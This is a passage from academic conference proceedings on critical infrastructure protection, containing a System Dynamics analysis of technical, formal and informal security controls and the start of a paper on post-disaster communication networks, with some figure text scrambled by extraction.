References 1. Hackers Have Attacked Foreign Utilities, CIA Analyst Says, http://www.washingtonpost.com/wp-dyn/content/article/2008/01/18/ AR2008011803277.html 2. Information technology - Security techniques - Information security incident management. Tech. Rep. TR 18044:2004, ISO/IEC (2004) 3. Integrated Operations on NCS (2004), http://www.olf.no/?22894.pdf 4. Information technology – security techniques – code of practice for information security management, ISO/IEC Std. 27002 (2005) 5. Information technology – security techniques – information security management systems – requirements, ISO/IEC Std. 27001 (2005) 6. Albrechtsen, E.: Friend or foe? Information security management of employees. Ph.D. thesis, NTNU (2008) 7. Argyris, C., Sch¨ on, D.A.: Organisational learning: A theory of action perspective. Addison-Wesley, Reading (1978) 8. Cooke, D.L.: Learning from Incidents. In: Proceedings of the 21st System Dynamics Conference (2003) 9. Cormack, A., et al.: TRANSITS course material for training of network security incident teams staff. Tech. rep., TERENA (2005) 10. Dhillon, G., Backhouse, J.: Current directions in IS security research: towards socioorganizational perspectives. Information Systems Journal 11(2), 127–153 (2001) 11. Forte, D.: Security standardization in incident management: the ITIL approach. Network Security 2007(1), 14–16 (2007) 12. Grance, T., Kent, K., Kim, B.: Computer security incident handling guide. Tech. Rep. Special Publication 800-61, NIST (2004), http://csrc.nist.gov/publications/nistpubs/800-61/sp800-61.pdf 13. Hammer, M., Champy, J.A.: Re-engineering the Corporation: A Manifesto for Business Revolution. Harper Collins (1993) 14. Hendrick, K., Benner, L.: Investigating accidents with STEP. CRC Press, Boca Raton (1986) 15. Jaatun, M.G., Albrechtsen, E., Line, M.B., Johnsen, S.O., Wærø, I., Longva, O.H., Tøndel, I.A.: A Study of Information Security Practice in a Critical Infrastructure Application. In: Rong, C., Jaatun, M.G., Sandnes, F.E., Yang, L.T., Ma, J. (eds.) ATC 2008. LNCS, vol. 5060, pp. 527–539. Springer, Heidelberg (2008) 16. Jaatun, M.G., Johnsen, S.O., Line, M.B., Longva, O.H., Tøndel, I.A., Albrechtsen, E., Wærø, I.: Incident Response Management in the oil and gas industry. Tech. Rep. SINTEF A4086, SINTEF ICT (2007), http://www.sintef.no/upload/10977/20071212_IRMA_Rapport.pdf 17. Jaatun, M.G. (ed.): Arbeidsseminar om IKT-sikkerhet i Integrerte Operasjoner: Referat (in Norwegian only). Tech. rep., SINTEF (2007), http://www.sintef.no/upload/10977/sluttrapport.pdf 18. Johnsen, S.O., Ask, R., Røisli, R.: Reducing Risk in Oil and Gas Production Operations. In: Goetz, E., Shenoi, S. (eds.) First Annual IFIP WG 11.10 International Conference, Critical Infrastructure Protection (2007)
246
M.B. Line et al.
19. Johnsen, S.O., Bjørkli, C., Steiro, T., Fartum, H., Haukenes, H., Ramberg, J., Skriver, J.: CRIOP: A scenario method for Crisis Intervention and Operability analysis. Tech. Rep. STF38 A03424, SINTEF (2003), www.criop.sintef.no 20. Kjell´en, U.: Prevention of accidents through experience feedback. Taylor and Francis, Abington (2000) 21. Klinke, A., Renn, O.: A new approach to risk evaluation and management: riskbased, precaution-based and discourse-based strategies. Risk Analysis 22(6), 1071– 1094 (2002) 22. Mitropoulos, S., Patsos, D., Douligeris, C.: On Incident Handling and Response: A state-of-the-art approach. Computers & Security 25(5), 351–370 (2006) 23. Siponen, M.T., Oinas-Kukkonen, H.: A review of information security issues and respective research contributions. Database for Advances in Information Systems 38(1), 60 (2007) 24. Slovic, P.: The perception of risk. Earthscan, London (2000) 25. Stouffer, K., Falco, J., Kent, K.: Guide to industrial control systems (ics) security (2nd draft). Tech. Rep. Special Publication 800-82, NIST (2007), http://csrc.nist.gov/publications/drafts/800-82/ 2nd-Draft-SP800-82-clean.pdf
Security Strategy Analysis for Critical Information Infrastructures Jose Manuel Torres, Finn Olav Sveen, and Jose Maria Sarriegi Tecnun (University of Navarra), Manuel de Lardizbal 13, 20018 San Sebastin, Spain
[email protected],
[email protected],
[email protected] Abstract. How do security departments relate to and manage information security controls in critical infrastructures (CI)? Our experience is that information security is usually seen as a technical problem with technical solutions. Researchers agree that there are more than just technical vulnerabilities. Vulnerabilities in processes and human fallibility creates a need for Formal and Informal controls in addition to Technical controls. These three controls are not independent, rather they are interdependent. They vary widely in implementation times and resource needs, making building security resources a challenging problem. We present a System Dynamics model which shows how security controls are interconnected and interdependent. The model is intended to aid security managers in CI to better understand information security management strategy, particularly the complexities involved in managing a socio-technical system where human, organisational and technical factors interact.
1 Introduction Security is a multifaceted problem encompassing both logical and physical issues. Protection is no longer a matter of locking the door to leave out unwanted guests. Today, those “guests” enter through fibre optic cables. We use technology to simplify our lives and to become more effective. However, technology evolves rapidly. New technology is often unproven and poorly understood, even by those who designed it. Technology is frequently deployed by people who only have knowledge of the technical principles behind it. In such an environment there will always be non-technical weaknesses to exploit and staying secure will be resource intensive, as controls must be created, maintained and audited to ensure that they work. Information security, extremely vital in critical infrastructures (CI) such as energy, transportation, health, and many others, competes for resources. In these complex and critical systems in which technology, processes and people exist together, security cannot be approached as a mere technological issue. “If you think technology can solve all your security problems, then you do not understand the problems neither technology” [1]. The analysis and control of the distribution of security efforts in CI is a key factor to improve prevention, detection and mitigation of current vulnerabilities. Technologicallyfocused CI security management strategies hide organisational and social issues that could for example create a formal vulnerability (e.g. not updating a security process) in one CI that causes a technical vulnerability in another CI [2]. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 247–257, 2009. c Springer-Verlag Berlin Heidelberg 2009
248
J.M. Torres, F.O. Sveen, and J.M. Sarriegi
Security experts indicate the necessity to understand the interdependencies between security controls to successfully protect critical information infrastructures [1,3,4]. However, little has been said about the impact that interdependencies between security controls and their dynamics have on strategy effectiveness [2,5]. Failing to understand these interdependencies and their dynamics can result in ineffective strategy that can cause poor coordination between decision makers and people responsible for rescue, recovery and restoration after incidents. We present a System Dynamics (SD) model that shows how CI security controls interact and the following consequences for resource allocation among them. SD is a modelling methodology that focuses on analysing the underlying structure that generates the behaviour of complex systems [6,7]. This structure is constituted by feedback, accumulations and information and material delays. SD models can be either qualitative or quantitative. The qualitative model of CI security presented here is the integrated result of a literature review [8] and a Group Model Building exercise with practitioners from industry [9]. GMB is a methodology for collaboratively building SD models [10,11,12]. It is an effective way of de-fragmenting partial mental models found in representative multidisciplinary teams. GMB elicits partial mental models, makes them explicit, combines them, resolves clashes and ambiguities, creates new insight and consensus. The result is new knowledge that is shared between participants. Security strategy is like any other business strategy. Strategy is the process of building up resources that can aid us [13,14]. We use this Resource-Based View of strategy to explain the three-sided-CI-security strategy. Strategy consists of having resources and building resources. The true management challenge is to build and sustain resources not to allocate them [13,14]. In this way security controls are resources like any other resources. We explain the current situation of security management strategy in CI and suggest how it should be redesigned.
2 Reactive Perspective on CI Information Security If incidents are infrequent, security will most likely not have a high priority until a serious incident happens. In the model in (Fig. 1), the variables Incidents and Impact represent the incidents suffered by a critical infrastructure and the consequences of those incidents respectively. The (+) sign next to the arrow from Incidents to Impact represents that increased frequency and/or severity of incidents, will increase the impact suffered by the CI. The same applies in the opposite direction, fewer serious attacks lead to fewer consequences. Hence, a change in Incidents causes a change in Impact in the same direction. A small incident is not enough to significantly change the organisations perception of security. Many smaller incidents over time or one or more large incidents over a shorter time period may cause a change in management’s perception of security (see Fig. 2). In the model in figure 1, this is represented by the link from Impact to Perceived Impact Trend. The (//) mark over the arrow denotes a time delay. Rarely do perceptions change instantly; they adjust and adopt over time. Hence, Perceived Impact Trend is negatively affected by Time to Change Perception of Impact Trend. Negative influence (-) means
Security Strategy Analysis for Critical Information Infrastructures
249
Time to Change Perception of Impact Trend Incidents Desired Security Level
Perceived Security Gap
-
+
Perceived Impact Trend B1: Reactive Security
+ Cost of Controls
Security Resources
+
+ Impact -
+ +
B2: Implementation Expenses +
-
Initiation Rate
B3: Maintenance Expenses
Initiated Security Controls
Implementation Rate + -
Time to Implement Controls
Security Controls in Depreciation Place Rate + Controls Obsolescense Time
Fig. 1. Reactive Security
that the influence moves in the opposite direction. If Time to Change Perception of Impact Trend increases, Perceived Impact Trend will take longer to adjust to Impact. The opposite is also true; a decrease will make Perceived Impact Trend adjust faster. When hit by an incident, the organisation is painfully made aware of its security shortcomings. If a large Perceived Security Gap is identified, more security resources are allocated to acquire new security controls. After new security controls have been decided on, represented by the Initiation Rate, they must be implemented; a process which takes time. This is represented in the model by the controls first residing in the stock Initiated Security Controls and then, being gradually moved over to Security Controls in Place at a speed decided by the Implementation Rate. When the controls are in place they stop incidents or reduce their impact. We now have a closed feedback loop, named B1. This is a balancing or goal seeking feedback loop. In this case, the goal of the loop is Desired Security Level. If the security department perceives security to be different from desired security, resources are adjusted until a satisfactory level is reached. An important consequence of this loop is that the security level is perceived indirectly. As long as nothing is happening the security level is perceived as adequate. Another consequence of B1 is that if resources for security are increased in response to incidents, over time security resources will gradually reduce unless the incidents continue constantly. More controls cause less impact which will over time cause management to perceive the security level as higher than necessary. As mentioned before,
250
J.M. Torres, F.O. Sveen, and J.M. Sarriegi
Fig. 2. Management Perception of Security
there is some inertia in the system: It takes some time before lower risk is perceived through the Perceived Impact Trend. The loops B2 and B3 act like brakes on the system. As more security controls are implemented, new ones become more costly, slowing down the initiation rate of new controls. The logic behind is that the most straightforward and least expensive controls are usually implemented first. As controls become more advanced they also become more costly to implement and maintain. If security strategies are reactive, only the absolute minimum security level is maintained under the normal condition of infrequent incidents. It is only when something happens that management and staff start to care about it. This is natural; they perceive their security level almost exclusively through incidents that have happened to them. When audit mechanisms and risk assessments are not in place, it is difficult to perceive whether you have good security or you are just being lucky.
3 Security Is a Complex System Securing systems, especially those related to energy, transportation and ICT is a complex task that requires implementing several types of security controls. These controls can be divided into different categories. Often cited in the security literature are technical, formal and informal controls [15], [16], [17]. Other authors propose analogous classifications using different names to refer to similar security controls, e.g.: technology controls, process controls and human controls [18]. For the purpose of this research we utilise technical, formal and informal controls to refer to the three aspects of security. These controls are defined as follows: Technical Controls: Hardware and software tools that restrict access to buildings, rooms, computer systems and programs in order to avoid unauthorised access or incorrect uses (biometric devices, locks, antivirus, firewalls, Intrusion Detection Systems (IDS), backups, etc). Formal Controls: The set of policies and procedures to manage access to and use of information. A subset of formal controls is those that are used to establish and ensure effective use of technical controls. Examples of formal controls include system audits, update mechanisms, risk evaluations, identification of security roles, segregation of responsibilities, implementing indicators, etc.
Security Strategy Analysis for Critical Information Infrastructures
251
Informal Controls: Interventions related to deploying information security through the workforce by enhancing user willpower and willingness. For example, training employees, implementing security incentives, increasing commitment to security, user motivation, etc. Basically, we are here talking about that elusive ’security culture’. These three security controls constitute a trinity of controls that are all necessary to achieve high security performance, especially because they are hierarchically dependent. Failure in one control may open up holes in another (see Fig. 2). However, our experience indicates that information security practises in several critical infrastructures are merely based on technical solutions. Security incidents, often of technical nature such as, viruses, worms and denial of service attacks, have positioned technological improvements over managerial solutions [19]. Another reinforcing factor is the profile of most security department staff. They usually have strong technical backgrounds with undeveloped managerial skills. They see themselves as technicians, not as managers and therefore, analytical, managerial and interpersonal skills are not worked upon. These skills are considered necessary to implement formal and informal controls [18]. A further complication is that implementing and maintaining controls is not straightforward. Each category of controls differ from the others in the time it takes to implement them, how often they must be renewed, reinforced or audited, as well as the attack mechanisms used to penetrate them. This level of complexity makes the security problem tough to manage. There is now three loops (B1, B4 and B7) which expand the CI security picture (see Fig. 3). Implementing and maintaining technical controls is usually relatively quick, at least compared to formal and informal controls. In general the implementation and maintenance of an Intrusion Detection System can be carried out fairly quickly and provides immediate results. In other words, Time to Implement Technical Controls has a low value (minutes, hours, sometimes days) in comparison to for example training users against social engineering threats (months or even years). Formal controls (e.g., implementing a system to measure the effectiveness of security controls) require longer implementation times, and regularly, their implementation requires getting people involved in the process. It takes time before the effectiveness of such controls can be seen. In other words Time to Implement Formal Controls has a higher value than Time to Implement Technical Controls. Informal controls (e.g. launching an awareness campaign, getting people involved and explaining the benefits and needs) are even harder to implement since it usually takes an even longer period of time. That is, Time to Implement Informal Controls has a higher value than both Time to Implement Formal Controls and Time to Implement Technical Controls. Building a security culture needs years. Although technical controls are the quickest to implement, they are also the controls that have to be renewed more often. Owing to rapid technological development, technical controls may become obsolete rapidly. Formal controls last longer than technical controls. When informal controls are fully in place, it can be interpreted as having a “security culture” where employees take security into account in their daily work and not just as an afterthought. This requires a change of mind for both employees and, crucially, for management as management sets precedence. If achieved, such a change
252
J.M. Torres, F.O. Sveen, and J.M. Sarriegi
of mind lasts. Instituting a security culture is critical as it impacts the other two classes of controls. For example, formal controls may, in the lack of a security culture, just be words on a piece of paper. Although informal controls are the most expensive and time consuming to implement, they also function longer. This is not to say that they do not deprecate. A security culture which is not supported will wither and die. We can further complicate the picture. The three categories of security controls can be extended by making distinctions within each security control (e.g., controls against internal or external attacks, controls against voluntary or involuntary incidents, etc). For the purpose of this research, it is not necessary to go into more detail than the Time to Change Perception of Impact Trend
Desired Security Level
Incidents +
-
Perceived Impact Trend
+
Perceived Security Gap
Impact
+
+ Security Resources +
+
Cost of Techncial Controls B2 +
+ Resources Remaining after Technical
-
Technical Initiation Rate Focus on Formal
+
B1: Reactive Security Technical Controls
Focus on Technical
Resources For Technical Security
B3
Initiated Technical Technical Security Security Controls Technical Controls Technical Implementation Rate Depreciation Rate + + Time to Implement Technical Controls
+ Cost of Formal Controls
Resources for Formal Security
B5 +
-
+
+
Time to Implement Formal Controls
Cost of Informal Controls
Resources Remaining after Formal
B8 -
Informal Initiation Rate
B4: Reactive Security Formal Controls
Formal Security Formal Controls Formal Implementation Rate Depreciation Rate + + -
+ Initiated Informal Security Controls
Formal Controls Obsolescence Time B7: Reactive Security Informal Controls
-
+
Technical Controls Obsolescense Time
B6
Initiated Formal Security Controls
+
Effective Security Controls + + +
+
+
Procurement Period
Formal Initiation Rate
-
+ B9
Informal Security Controls Informal Informal Implementation Rate Depreciation Rate + -
Time to Implement Informal Controls
Fig. 3. Trinity of Controls
Informal Controls Obsolescence Time
Security Strategy Analysis for Critical Information Infrastructures
253
three types of controls previously explained. However, it is important to understand the interdependencies between them.
4 Security Controls Are Not Independent Technical controls depend on formal controls to function. Likewise, formal controls depend on informal controls to function well. For example, there is no point in having password protection if it is written on post-its on the screens. Password access control is a technical measure while sticking the password to the screen can be considered a breach of formal routines. The lack of informal controls in this case is the user’s lack of understanding of why passwords should not be stuck on the screen. This hierarchical dependence of security controls is shown in Fig. 4. In addition to the three loops shown in Fig. 3 (B1, B4, B7), we now have two more loops that significantly affect the ultimate goal of the system (decreasing the impact): ’Technical Depends on Formal’ (B10) and ’Formal Depends on Informal’ (B11) (see Fig. 4). The direct links from Informal Security Controls and Effective Formal Security Controls to Effective Security Controls represent defences against impact suffered from non-technical incidents. The attacker may for example use impersonation to gain confidential information. However, even if an incident is purely technical and technical controls are in place, an attack may still succeed because of inadequate formal controls. An example is when failure to install a patch allows a worm to infect the system. A lower tech example is a simple door lock. To open the door an attacker can attack the technical defence. He can pick the lock. A second option is to attack the formal layer. Sloppy key management may allow access to the key. Third, the attacker can attack the informal layer by exploiting people’s tendencies to be helpful, e.g., use social engineering to have someone open the door for him. The effectiveness of implemented technical controls can be extended and improved by robust formal controls (B10). Likewise, informal controls ease the implementation of formal controls, extending and improving their effectiveness (B11). A useful metaphor to explain this dependency is a house-building process. The informal controls can be understood as a strong foundation. On the foundation walls, or formal controls, can be raised and ultimately the walls can support a roof which is the technical controls. The foundation, walls and roof all mutually support each other to keep rain, wind and cold (attacks and/or incidents) out. Unfortunately, the controls presented above are often understood as independent layers where the first line of defence is based on technical countermeasures. The way in which information security has been approached until now can be compared to an upside down house-building process. Organisations usually start by implementing technical controls, followed by some formal controls and then barely implement informal controls. Realising these interdependencies does not come at the first glance. If we take into account that informal controls are the controls that require the most effort and the longest implementation times, it partially explains why information security departments often try to build their ”security house” starting with the roof (technical controls), followed by the walls (formal controls) and leaving the foundation (informal controls) for last.
254
J.M. Torres, F.O. Sveen, and J.M. Sarriegi Time to Change Perception of Impact Trend Desired Security Level
Perceived Impact Trend
Security Gap+
+ Security Resources +
+
+
Impact -
Effective Security Controls + + +
B1 Focus on Technical +
Cost of Techncial + Controls
Resources For Technical Security + Resources Remaining after Technical
-
Focus on Formal
+
B2
Technical Initiation Rate
+
+
Incidents
-
Effective Technical +Security Controls
B3
Initiated Technical Technical Security Security Controls Technical Controls Technical Implementation Rate Depreciation Rate + + -
Procurement Period
Time to Implement Technical Controls
Cost of Formal Controls +
B5
+
-
Formal Initiation Rate
Initiated Formal Security Controls
-
Formal Implementation Rate + -
Cost of Informal Controls B8 Informal Initiation Rate -
+ Initiated Informal Security Controls
Effective Formal Security Controls + +
Time to Implement Formal Controls
+ -
+
B4
B6
Resources Remaining after Formal
Technical Controls Obsolescense Time B10: Technical depends on Formal
+
Resources for Formal Security
+
Formal Security Controls
Formal Depreciation Rate + -
B7
Formal Controls Obsolescence Time
B11: Formal Depends on Informal
+ B9
Informal Security Controls Informal Informal Implementation Rate Depreciation Rate + -
Time to Implement Informal Controls
Informal Controls Obsolescence Time
Fig. 4. Hierarchical Interdependence of Security Controls
The difficulty of building strong informal controls, i.e. security culture, is widely recognised. This has led to various attempts to compensate by building very strong formal controls. Evident by the large number of information security standards that currently exist. Examples are the ISO 27000 series and COBIT to mention just a couple of them. However, implementing strong formal controls is not possible without implementing strong informal controls. There is a difference between what is written on paper and what is actually done in organisations. Failure to build a security culture will sabotage attempts at introducing formal controls. In a sense, it is like trying to compensate for a shaky foundation by building thicker walls. This clearly does not help.
Security Strategy Analysis for Critical Information Infrastructures
255
Technical Control
Informal Control Formal Control Fig. 5. CI Security Strategy
We do not propose adopting a bottom to top security approach, as clearly without any technical and formal controls at all any critical infrastructure would be vulnerable even with very strong informal controls, although we believe, less so. Instead we stress the importance of paying simultaneous attention to all three categories of controls and to think long term. One should not just take into account what happened yesterday, but also what might happen in the future. Failing to assign resources to build up and maintain any class of security controls could result in severe consequences since the system becomes permeable to potential attacks. This security approach, further explained in [2], is based on the assumption that if an attacker finds and exploits a single vulnerability in any of the three controls (the holes in the cheese represent vulnerabilities), then the CI’s critical assets could become accessible (see Fig. 5).
5 Conclusions and Observations A fairly large number of critical infrastructures possess a technological-based view of managing information security, which increases the probability of important disruptions to society. Their focus is primarily on technical solutions, without a holistic view of the system. Their strategies are reactive and improvised. The lack of indicators and risk assessments in many cases, leave these critical systems in a situation where security management models are not reviewed and the evolution of the organisation’s security level is often unknown. As a result, security solutions in many cases are applied to symptoms instead of mitigating the root of the problem. Security management in many organisations have not yet been elevated to the level of strategy. Their security management process is tactical, i.e. it concerns the allocation of resources already built up, not the build up of resources. These reactive security processes are a consequence of the understanding that stakeholders have of security. For some of them, security is the process of implementing technical controls. For others, security actions are purely based on regulatory laws, which not only changes the security focus but also cause costly and inefficient investments when CIs only secure assets and processes subjected to regulations. Information security in CI must be extended to encompass something approximating the CIA-NR definition, where achieving confidentiality, integrity, availability and non-
256
J.M. Torres, F.O. Sveen, and J.M. Sarriegi
repudiation starts by understanding the interdependencies between the three classes of security controls presented in this paper. Based on our data and findings we do believe that effective security management strategy relies on simultaneous implementation of technical, formal and informal controls. However, we know little of to what degree these controls depend on each other. That is, how much Technical Controls depend on Formal Controls and Formal Controls on Informal Controls. The details about the shapes of the curves of these relationships have are still unknown. However, they are probably not linear and likely to vary from organisation to organisation. Therefore effort should be dedicated to investigating them. Another relationship that lacks empirical data and needs further development is the relationship between Effective Security Controls and Impact. Having more insight about these relationships would improve the basis for CI security policy designs and implementations. It would also allow us to further develop the qualitative model presented in this paper into a simulation model. Finally, the process of building conceptual models using SD turned out to be fruitful in thinking about the dynamics of information security. The approach used in this paper allowed us to better understand the different interactions, interdependencies and time delays that exists in CI information security systems. Managing information security in CI is more complex than the diagrams shown above (see Fig. 4). But, such a simple diagram provides a framework on which more complex models can be built. It is a tool that helps managers and security professionals think about security without getting bogged down in all the small details.
References 1. Schneier, B.: Applied Cryptography: Protocols, Algorithms and Source Code, 1st edn. John Wiley and Sons Inc., New York (1994) 2. Torres, J.M., Sarriegi, J.M.: Dynamics aspects of security management of information systems (2004) 3. Mitnick, K.: The Art of Deception. John Wiley Inc., Indianapolis (2002) 4. Anderson, R.: Proceedings of 17th Annual Computer Security Applications Conference, ACSAC 2001, New Orleans, Louisiana (2001) 5. Dhillon, G.: Computers & Security 20(2), 165 (2001) 6. Forrester, J.: Industrial Dynamics. Productivity Press, Cambridge (1961) 7. Sterman, J.D.: Business Dynamics: Systems Thinking and Modeling for a Complex World. Irwin/McGraw-Hill, Boston (2000) 8. Torres, J.M.: An information systems security management framework for small and medium size enterprises (unpublished doctoral thesis). Ph.D. thesis, Tecnun, University of Navarra (2007) 9. Sarriegi, J.M., Torres, J.M., Santos, I.D., Egozcue, J.E., Liberal, D.: Modeling and simulating information security management (2007) 10. Richardson, G.P., Andersen, D.F.: System Dynamics Review 11(2), 113 (1995) 11. Vennix, J.A., Andersen, D.F., Richardson, G.P., Rohrbaugh, J.: In Modeling for Learning Organizations. In: Morecroft, J.D.W., Sterman, J.D. (eds.). Productivity Press, Portland (1994) 12. Vennix, J.A.: System Dynamics Review 15(4), 379–401 (1999) 13. Warren, K.: Competitive Strategy Dynamics. John Wiley & Sons, Ltd., Chichester (2002) 14. Warren, K.: Strategic Management Dynamics. John Wiley & Sons, Ltd., Chichester (2008)
Security Strategy Analysis for Critical Information Infrastructures 15. 16. 17. 18. 19.
257
Botha, R., Gaadingwe, T.: Computers & Security 25(4), 247 (2006) Dhillon, G.: Information Management & Computer Security 7(4), 171 (1999) Dhillon, G., Moores, S.: Computers & Security 20(8), 715 (2001) Schneier, B.: Beyond Fear, 1st edn. Copernicus Books, New York (2003) Sarriegi, J.M., Eceiza, E., Torres, J.M., Santos, J.: Informe sobre la Gestion de la Seguridad de los Sistemas de Informacion. Miramon Enpresa Digitala (2005)
Emerging Information Infrastructures: Cooperation in Disasters Mikael Asplund1 , Simin Nadjm-Tehrani1, and Johan Sigholm2 1
Department of Computer and Information Science, Link¨oping University SE-581 83 Link¨oping, Sweden {mikas,simin}@ida.liu.se 2 Swedish National Defence College Drottning Kristinas v¨ag 37, SE-115 93 Stockholm, Sweden
[email protected] Abstract. Disasters are characterised by their devastating effect on human lives and the society’s ability to function. Unfortunately, rescue operations and the possibility to re-establish a working society after such events is often hampered by the lack of functioning communication infrastructures. This paper describes the challenges ahead in creating new communication networks to support postdisaster operations, and sets them in the context of the current issues in protection of critical infrastructures. The analysis reveals that while there are some common concerns there are also fundamental differences. The paper serves as an overview of some promising research directions and pointers to existing works in these areas.
1 Introduction Reliable and secure communication is at the heart of well being and delivery of critical services in today’s society, making power grids, financial services, transportation, government and defence highly dependent on ICT networks. Unfortunately, the complexity and interdependencies of these systems make them vulnerable to faults, attacks and accidents. One adverse condition may have unforeseen consequences in other dependent networks (electricity networks dependence on communication protocols, leading to blackouts as opposed to local outages). Even worse, when a major disaster strikes, such as the Hurricane Katrina or the tsunami in east Asia, large parts of the critical infrastructure can be completely incapacitated for weeks. In those situations we need to re-establish infrastructures to support rescue operations and the transition back to a normal state. For a timely delivery of critical services to citizens and decision makers, two types of competences are therefore needed: (1) protecting existing infrastructures so that we can continue to enjoy the delivery of reliable services despite the increasing threat picture (locally and globally), (2) moving forward to study the issue of reliability and security in new networked infrastructures that represent a new paradigm in service delivery.
This work was supported by the Swedish Civil Contingencies Agency and the second author was partially supported by the University of Luxembourg.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 258–270, 2009. c Springer-Verlag Berlin Heidelberg 2009
Emerging Information Infrastructures: Cooperation in Disasters
259
The main character of these new networks are the loosely connected nature, in some cases combined with mobility, and generally with several actors as opposed to a single owner/administrator. One example of such an ”infrastructure-less” network is described by the notion of hastily formed networks built-up in response to disasters. Establishing effective communication in presence of adverse events and outages requires a combination of human processes and technical development. Traditional critical infrastructures need the integration of cultural, economic, and technical analyses (security should not be considered as a cost but as an asset ensuring service continuity). Spontaneous networks require dealing with challenges of enforcing security without a central authority, in addition to novel technical solutions that provide a basis for a conversation space [13] from heterogeneous subnets. The goal of this paper is to describe some of the challenges ahead in emerging critical information infrastructures. These have to be handled when considering the migration path from today’s critical information infrastructures into the emerging ones. To make the challenges explicit, we use the case of infrastructures in post-disaster operation to highlight the technical issues. If we can solve the problems in this setting, we can also do it in the pre-disaster state of the convergent networks. This requires a new way of thinking about how reliable and timely message delivery can be accomplished in challenged environments. That is, without strong assumptions regarding organisations, technical equipment, or system knowledge. The paper consists of two main parts. The first part (Section 2) deals with existing critical information infrastructures, and the second part (Section 3) with spontaneous post-disaster networks. Each part describes some of the main characteristics, the major research challenges ahead and an outlook on what we can expect in the coming years from ongoing research projects. Finally, Section 4 contains summary and conclusions.
2 Existing Critical Information Infrastructures We will now proceed to give an overview of characteristics of current critical information infrastructures. We do not in any way provide an exhaustive coverage, but rather we try to give the background as to later be able to highlight the differences between the systems we have today, and the spontaneous information networks that we believe will continue to grow in importance. 2.1 Characteristics The large part of today’s information infrastructure is static and wireline. The networks are managed centrally or hierarchically [2] by known actors who do not change over time. Although communication problems can occur for particular links, redundancy often prevents network partitions from happening [30]. A recent trend is to put more and more services on top of the Internet [7], which has shown itself to be one of the most reliable information infrastructures even in presence of adverse conditions [26] (although susceptible to frequent misconfiguration problems [31]). One of the biggest challenges here is probably overloads which can be the result of a denial of service attack or the result of legitimate needs which peak at the
260
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
same time (e.g., major news web sites going down after 9/11). Notable illustration of this phenomenon is the adverse effects of TCP when used as the main communication protocol for connecting operation and management units in energy networks during a blackout [8]. Traditionally, many information networks have been proprietary and thus not fitted for integration with other networks. As a response to this, researchers and industry have started to explore the possibility of opening up systems in order to achieve greater resilience. However, this is not without complications [20]. Corporate entities are not willing to share too much information with other actors since it might mean losing the business advantage. Moreover, there are regulations and policies which must be adhered to regarding communication channels. The problem is further complicated by the fact that information needs span across borders, requiring international agreements. 2.2 Challenges We believe that there are four main challenges to face in the near future in the area of information infrastructure protection, summarised in table 1. The interdependencies between different types of infrastructures is one key aspect which makes protecting these systems a complicated task and an interesting research topic. For a nice overview we refer to Rinaldi et al. [40], as well as the outcomes from recent European projects [25,12]. For example, information infrastructures depend on electrical infrastructures and vice versa, and the same relationship holds between communication and transport systems. In order to fully understand these interdependencies it is clear that we need to provide good models of system behaviour, both under normal circumstances and in the event of crises [32]. The transition from static, managed networks to dynamic networks with little or no central control has already started. Peer-to-peer technologies are being used to share data, stream multimedia and to manage computing capacity. Such networks have proven to be resilient to failures and overloads, but they cannot easily provide absolute service guarantees. In addition, an increasing proportion of the network traffic is going through the wireless medium, using a wide variety of radio standards (e.g. GPRS, HSDPA, WiMAX, Wi-Fi). This brings new challenges of mobility, resource allocation and heterogeneity. Heterogeneity in the technical communication platforms brings two aspects to this equation. The multiplicity of communication technologies will bring a much needed Table 1. Challenges for traditional infrastructures Challenge Complexity and interdependencies Transition from managed to unmanaged
Emerging solutions Modelling and risk analysis Peer-to-peer technologies, self-managing systems Heterogeneity Standardised protocols, overlay networks, software defined radio Organised threats with economic motives or Intrusion tolerance, diversity, partial adversary disruptions rejuvenation
Emerging Information Infrastructures: Cooperation in Disasters
261
diversity, but at the same time demands dealing with interoperability [39]. Solving these issues is as much an organisational problem as it is technical. Agreeing on standards between different countries and major corporations takes time and has a varying degree of success. Cyber attacks has gone from being a rare occurrence motivated by curiosity or malice to an economical and political weapon. Despite a large amount of research in the last few years, there are still many tough problems to solve, partly because new threats appear and partly because the systems themselves are changing and evolving. Means for achieving resilience or dependability can be broadly divided in proactive or reactive approaches, and experience shows that both are required. Proactive protection includes hardware redundancy [23], defence-in-depth, diversity and active replication, transparent software recovery [49], etc. Reactive mechanisms will need to cover the events that cannot be prevented. One of the main research areas in this context is that of intrusion detection systems [33,28], where researchers are trying to tackle an almost intractable challenge in detecting significant intrusions without also producing vast amounts of false alarms. 2.3 Outlook The research on modelling of critical infrastructures will continue to be an active field for many years. It is important to understand that there are many levels at which modelling can be done. They range from Guimera and Amaral’s models of airport connections [21] to Svendsen and Wolthusen’s [47] generic graph-based analysis of resource flows. We will definitely see more research of this kind, and models will become more detailed and hopefully good tools will be developed to manage them. The CRUTIAL project [12] is one of the major efforts in this direction with the focus on electric power infrastructures. Moreover, we believe that the coming years will provide a wide range of solutions in addressing the security and reliability of information infrastructures. Specifically in Europe we have seen the launch of a number of recent projects that will bring about partial solutions to this difficult equation: DIESIS [14] providing simulation platforms for e-infrastructures, FORWARD [18] will bring about a collective knowledge on the security threat landscape, threat detection and prevention, and WOMBAT [51] will create a live repository of actual and current threats to information infrastructures on a global basis. However, the set of solutions should also cover the migration to less centralised and more heterogeneous networks. This entails reusing some non-centralised solutions in new contexts; for example, the potential convergence of P2P technologies – that were originally intended for wired infrastructures – with the mobile ad hoc scenarios. The project HIDENETS [24] has addressed multihop vehicular networks (VANETs), that can potentially become part of a modern society’s information infrastructure. Within the defence sector, (as well as in the civilian communities) one of the possible ways to deal with heterogeneity is the migration from conventional static radio platforms to systems incorporating reconfigurable software-defined radio (SDR) technology. The change in paradigm for military radio communication is not only expected to be a major money-saver, but also to grant the adopting countries the capability to
262
M. Asplund, S. Nadjm-Tehrani, and J. Sigholm
